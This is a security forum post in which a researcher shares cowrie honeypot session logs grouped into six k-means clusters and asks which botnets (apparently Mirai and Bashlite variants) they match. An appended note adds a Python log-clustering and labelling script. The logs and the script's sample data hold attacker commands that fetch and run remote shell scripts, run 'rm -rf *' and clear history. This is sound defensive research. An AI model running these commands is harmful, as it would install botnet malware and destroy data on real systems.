
SANS ISC: Need help with classifying botnets via log entries - SANS Internet Storm Center SANS ISC InfoSec Forums


Need help with classifying botnets via log entries
Hey there,

I wrote a program which successfully does k-means clustering with cowrie log entries from honeypots to assign attack cycles to one of 6 different clusters so I can statistically analyze what type of bot is used by attackers. My problem is that I can't find much information about typical log entries from bots on the internet. Can one of you assign the following examples of each cluster to a common botnet (e.g. Mirai, Bashlite, etc.)?


#########
CLUSTER 0
#########
14 11 31.14.45.6 37045 2016-10-11T15:15:03+0000 New connection
14 11 31.14.45.6 37045 2016-10-11T15:15:04+0000 login attempt [root/root] succeeded
14 11 31.14.45.6 37045 2016-10-11T15:15:05+0000 Opening TTY Log: log/tty/20161011-151505-None-11i....
14 11 31.14.45.6 37045 2016-10-11T15:15:05+0000 Warning: state changed and new state returned
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: enable
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: enable
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: system
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: system
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: shell
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command not found: shell
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: sh
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: sh
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: cat /proc/mounts
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 Command found: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:40+0000 Closing TTY Log: log/tty/20161011-151505-None-11i....
14 11 31.14.45.6 37045 2016-10-11T15:15:40+0000 Connection lost after 37 seconds


#########
CLUSTER 1
#########
21806 6035 113.23.72.170 60272 2016-10-20T00:45:11+0000 New connection
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 login attempt [root/root] succeeded
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 Opening TTY Log: log/tty/20161020-004513-None-6035...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:13+0000 Warning: state changed and new state returned
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: enable
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: enable
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: system
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: system
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: shell
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command not found: shell
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: sh
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command found: sh
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cat /proc/mounts
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cd /dev && >.s || cd /var/tmp/ && >.s || cd /...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /dev
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var/tmp
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var/run
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /var
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /tmp
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cd /home
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: > .s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cat /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: cp /bin/echo /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 CMD: /bin/busybox chmod 777 .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: /bin/busybox chmod 777 /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: chmod 777 /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 CMD: cat .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 Command found: cat /home/.s
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 Command found: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:19+0000 Closing TTY Log: log/tty/20161020-004513-None-6035...
21806 6035 113.23.72.170 60272 2016-10-20T00:45:19+0000 Connection lost after 8 seconds


#########
CLUSTER 2
#########
94 88 61.222.241.117 47743 2016-10-11T16:02:04+0000 New connection
94 88 61.222.241.117 47743 2016-10-11T16:02:14+0000 login attempt [root/root] succeeded
94 88 61.222.241.117 47743 2016-10-11T16:02:15+0000 Opening TTY Log: log/tty/20161011-160215-None-88i....
94 88 61.222.241.117 47743 2016-10-11T16:02:15+0000 Warning: state changed and new state returned
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 CMD: sh || bash || shell
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command found: sh
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command found: bash
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 Command not found: shell
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 CMD: echo loldongs || busybox echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: busybox echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:23+0000 Command found: echo loldongs
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 CMD: cd /tmp || cd /var/run || cd /dev/shm || cd /...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /tmp
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /var/run
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /dev/shm
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /mnt
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: cd /var
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: rm -f /var/log /var/run /var/mail /...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: busybox wget http://93.158.200.115/...
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: wget http://93.158.200.115/one.sh
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Command found: wget http://93.158.200.115/one.sh
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Closing TTY Log: log/tty/20161011-160215-None-88i....
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 Connection lost after 23 seconds


#########
CLUSTER 3
#########
3427 3267 85.105.155.21 40020 2016-10-12T21:37:33+0000 New connection
3427 3267 85.105.155.21 40020 2016-10-12T21:37:33+0000 login attempt [root/root] succeeded
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Opening TTY Log: log/tty/20161012-213734-None-3267...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Warning: state changed and new state returned
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 CMD: shell
3427 3267 85.105.155.21 40020 2016-10-12T21:37:34+0000 Command not found: shell
3427 3267 85.105.155.21 40020 2016-10-12T21:37:37+0000 CMD: sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:37+0000 Command found: sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:39+0000 CMD: free
3427 3267 85.105.155.21 40020 2016-10-12T21:37:39+0000 Command found: free
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 CMD: mkdir -p /var/... && rm -f /var/.../*; ftpget...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: mkdir -p /var/...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: rm -f /var/.../*
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: ftpget -u ftp 164.132.237.180 /...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: wget -O /var/.../dn.sh http://164.1...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: tftp -g -r dn.sh -l /var/.../dn...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: chmod +x /var/.../dn.sh
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command found: sh /var/.../dn.sh &
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 CMD: /etc/firewall_stop
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Command not found: /etc/firewall_stop
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Closing TTY Log: log/tty/20161012-213734-None-3267...
3427 3267 85.105.155.21 40020 2016-10-12T21:37:40+0000 Connection lost after 7 seconds


#########
CLUSTER 4
#########
4513 4310 46.172.91.20 47029 2016-10-13T04:59:41+0000 New connection
4513 4310 46.172.91.20 47029 2016-10-13T04:59:43+0000 login attempt [root/123456] succeeded
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Opening TTY Log: log/tty/20161013-045944-None-4310...
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Warning: state changed and new state returned
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 CMD: sh
4513 4310 46.172.91.20 47029 2016-10-13T04:59:44+0000 Command found: sh
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 CMD: mount
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Command found: mount
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Reading txtcmd from "txtcmds/bin/mount"
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 CMD: cat /proc/cpuinfo
4513 4310 46.172.91.20 47029 2016-10-13T04:59:45+0000 Command found: cat /proc/cpuinfo
4513 4310 46.172.91.20 47029 2016-10-13T04:59:50+0000 Closing TTY Log: log/tty/20161013-045944-None-4310...
4513 4310 46.172.91.20 47029 2016-10-13T04:59:50+0000 Connection lost after 8 seconds


#########
CLUSTER 5
#########
3531 3363 124.107.59.21 35557 2016-10-12T22:58:26+0000 New connection
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 login attempt [root/root] succeeded
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 Opening TTY Log: log/tty/20161012-225854-None-3363...
3531 3363 124.107.59.21 35557 2016-10-12T22:58:54+0000 Warning: state changed and new state returned
3531 3363 124.107.59.21 35557 2016-10-12T22:59:16+0000 CMD: sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:16+0000 Command found: sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 Command found: wget http://45.32.194.93/bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: wget http://45.32.194.93/bins.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: tftp 45.32.194.93 -c get tftp1....
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: tftp -r tftp2.sh -g 45.32.194.9...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: chmod 777 tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: ftpget -v -u anonymous -p anony...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: sh ftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: rm -rf bins.sh tftp1.sh tftp2.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command not found: rm -rf *
3531 3363 124.107.59.21 35557 2016-10-12T22:59:24+0000 Command found: history -c
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 CMD: cd /tmp || cd /var/run || cd /mnt || cd /root...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /tmp
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /var/run
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /mnt
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /root
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: cd /
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: wget http://45.32.194.93/bins.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh bins.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: tftp 45.32.194.93 -c get tftp1....
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh tftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: tftp -r tftp2.sh -g 45.32.194.9...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: chmod 777 tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh tftp2.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: ftpget -v -u anonymous -p anony...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: sh ftp1.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: rm -rf bins.sh tftp1.sh tftp2.s...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command not found: rm -rf *
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Command found: history -c
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Closing TTY Log: log/tty/20161012-225854-None-3363...
3531 3363 124.107.59.21 35557 2016-10-12T22:59:32+0000 Connection lost after 66 seconds
Anonymous
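Editor's note, added to the thread and not part of the poster's program: the sessions above can be classified before (or instead of) clustering by looking for the fixed command sequences the loaders send. The script below parses cowrie lines in the layout shown in the post (the field order counter, session id, source IP, source port, timestamp, message is an assumption read off the post), splits each session into individual shell commands, builds a binary feature vector per session, clusters the vectors with a small deterministic k-means, and attaches a behavioural label per session so the two can be compared. The `mirai_loader` label reflects the telnet loader sequence in the public Mirai source (`enable`, `system`, `shell`, `sh`, `/bin/busybox <TOKEN>`, `cat /proc/mounts`, then `cp /bin/echo` into a writable directory and `cat` it to read the ELF header); the token after `/bin/busybox` differs between forks, and ECCHI is the one seen in clusters 0 and 1. The other labels describe behaviour only and are not tied to a family; all of them are working hypotheses. The sample log is constructed and abbreviated from clusters 0, 1, 2 and 5, not a copy of the page's lines.

```python
"""Parse cowrie session logs laid out as in the post, turn each session into a
feature vector, cluster with a small deterministic k-means, and attach a
behavioural label so cluster membership can be checked against it."""
import re
from collections import OrderedDict

# Constructed, abbreviated sample modelled on the post's clusters 0, 1, 2 and 5.
# Not a verbatim copy of the page's logs; only CMD lines carry features.
SAMPLE_LOG = """\
14 11 31.14.45.6 37045 2016-10-11T15:15:03+0000 New connection
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: enable
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: system
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: shell
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: sh
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: /bin/busybox ECCHI
14 11 31.14.45.6 37045 2016-10-11T15:15:08+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: enable
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: system
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: shell
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: sh
21806 6035 113.23.72.170 60272 2016-10-20T00:45:15+0000 CMD: /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cat /proc/mounts; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:16+0000 CMD: cd /dev && >.s || cd /tmp && >.s; cp /bin/echo .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:17+0000 CMD: /bin/busybox chmod 777 .s; /bin/busybox ECCHI
21806 6035 113.23.72.170 60272 2016-10-20T00:45:18+0000 CMD: cat .s; /bin/busybox ECCHI
94 88 61.222.241.117 47743 2016-10-11T16:02:21+0000 CMD: sh || bash || shell
94 88 61.222.241.117 47743 2016-10-11T16:02:27+0000 CMD: cd /tmp || cd /var/run; wget http://93.158.200.115/one.sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:16+0000 CMD: sh
3531 3363 124.107.59.21 35557 2016-10-12T22:59:20+0000 CMD: cd /tmp || cd /; wget http://45.32.194.93/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.32.194.93 -c get tftp1.sh; rm -rf *; history -c
"""

# Field layout assumed from the post: counter, session id, src ip, src port, timestamp, message.
LINE_RE = re.compile(r"^(\d+) (\d+) (\S+) (\d+) (\S+) (.*)$")
SPLIT_RE = re.compile(r"\s*(?:;|\|\||&&)\s*")                # split compound shell lines
MARKER_RE = re.compile(r"/bin/busybox ([A-Z][A-Z0-9]{2,})")  # upper-case token, not an applet


def parse_sessions(text):
    """Group the individual shell commands of each session by (src ip, src port)."""
    sessions = OrderedDict()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _, _, ip, port, _, msg = m.groups()
        cmds = sessions.setdefault((ip, port), [])
        if msg.startswith("CMD: "):
            cmds.extend(c.strip() for c in SPLIT_RE.split(msg[5:]) if c.strip())
    return sessions


def busybox_marker(cmds):
    """The fork-specific token the loader passes to busybox (e.g. ECCHI), if any."""
    for c in cmds:
        m = MARKER_RE.search(c)
        if m:
            return m.group(1)
    return None


def _has(cmds, pattern):
    return any(re.search(pattern, c) for c in cmds)


# Binary features; the order defines the vector layout handed to k-means.
FEATURES = OrderedDict([
    ("probe_enable_system_shell", lambda c: {"enable", "system", "shell"} <= set(c)),
    ("busybox_marker", lambda c: busybox_marker(c) is not None),
    ("proc_mounts", lambda c: "cat /proc/mounts" in c),
    ("echo_copy_arch_probe", lambda c: _has(c, r"cp /bin/echo ")),
    ("wget", lambda c: _has(c, r"\bwget\b")),
    ("tftp", lambda c: _has(c, r"\btftp\b")),
    ("ftpget", lambda c: _has(c, r"\bftpget\b")),
    ("chmod_exec", lambda c: _has(c, r"chmod (\+x|777)")),
    ("run_script", lambda c: _has(c, r"^sh \S+\.sh")),
    ("cleanup", lambda c: _has(c, r"^(rm -rf|history -c)")),
    ("dir_hopping", lambda c: sum(x.startswith("cd /") for x in c) >= 2),
])


def features(cmds):
    return [1.0 if fn(cmds) else 0.0 for fn in FEATURES.values()]


def label_session(cmds):
    """Behavioural label. 'mirai_loader' follows the telnet loader sequence in the public
    Mirai source; the other labels are behaviour-only. Hypotheses, not ground truth."""
    f = dict(zip(FEATURES, features(cmds)))
    downloads = f["wget"] or f["tftp"] or f["ftpget"]
    if f["probe_enable_system_shell"] and f["busybox_marker"]:
        return "mirai_loader/" + ("arch_probe" if f["echo_copy_arch_probe"] else "recon")
    if downloads and (f["chmod_exec"] or f["run_script"]):
        return "shell_download_loader"
    return "download_attempt" if downloads else "recon_only"


def kmeans(points, k, max_iter=100):
    """Deterministic k-means: farthest-first seeding, squared Euclidean distance."""
    def d2(a, b):
        return sum((x - y) ** 2 for x, y in zip(a, b))
    centroids = [list(points[0])]
    while len(centroids) < k:  # next seed = point farthest from its nearest centroid
        centroids.append(list(max(points, key=lambda p: min(d2(p, c) for c in centroids))))
    assign = None
    for _ in range(max_iter):
        new = [min(range(k), key=lambda i: d2(p, centroids[i])) for p in points]
        if new == assign:
            break
        assign = new
        for i in range(k):
            members = [p for p, a in zip(points, assign) if a == i]
            if members:
                centroids[i] = [sum(col) / len(members) for col in zip(*members)]
    return assign


def cluster_sessions(text, k=2):
    """Map each session to its k-means cluster, behavioural label and busybox marker."""
    sessions = parse_sessions(text)
    keys = list(sessions)
    assign = kmeans([features(sessions[key]) for key in keys], k)
    return {key: {"cluster": a, "label": label_session(sessions[key]),
                  "marker": busybox_marker(sessions[key])}
            for key, a in zip(keys, assign)}


if __name__ == "__main__":
    for key, info in cluster_sessions(SAMPLE_LOG).items():
        print(key, info)
```

On the sample, the two ECCHI sessions land in one cluster and the two wget-based sessions in the other, which is the split the labels also produce. With real volumes the useful checks are the disagreements: a cluster whose members carry several different labels, or one label spread across several clusters, usually means the feature set (here a handful of command patterns) is not capturing what distinguishes the loaders. The busybox marker and the download URL host are the fields worth keeping per session, since fork tokens and hosting infrastructure change faster than the command sequence itself.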
